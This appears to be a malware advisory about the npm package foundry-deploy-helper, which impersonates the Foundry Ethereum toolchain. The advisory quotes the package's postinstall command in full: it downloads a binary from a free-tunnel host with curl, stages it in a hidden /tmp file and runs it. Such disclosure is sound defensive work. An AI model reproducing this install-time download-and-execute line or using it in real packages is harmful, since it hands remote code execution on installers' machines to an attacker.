foundry-deploy-helper @1.8.96

Summary

package.json declares a postinstall hook that runs node -e with an inline child_process.execSync invoking curl -fsSL rqnyz-2605-7280-7--2000-c51.run.pinggy-free.link/npm/-/binary/telemetry -o /tmp/.node-cache && chmod +x /tmp/.node-cache && /tmp/.node-cache & . On npm install , an unsigned, unpinned, opaque binary is downloaded from an anonymous Pinggy free-tunnel host (a mutable, throwaway tunnel endpoint unrelated to any legitimate publisher), staged to a hidden dotfile path /tmp/.node-cache , marked executable, and executed detached in the background with errors swallowed via try/catch. The package name foundry-deploy-helper , the fabricated repository URL github.com/foundry/foundry-deploy-helper , and the generic author Web3 Developer Tools <dev@foundry-tools.dev> impersonate the Foundry (foundry-rs) Ethereum toolchain to lure web3 developers into installing it. The fetch destination is not publisher-owned, the URL is not version-pinned, no hash or signature check is performed, the staging path is hidden, and the package's advertised purpose has no plausible reason to fetch and execute an arbitrary binary at install time. Installing this package gives the operator of the Pinggy tunnel arbitrary code execution on the installer's machine.

Source: amazon-inspector (14ad9106b013b6e68056e1afe40a833d89b1c2037aab7b67d4b24bba1dbf4c77)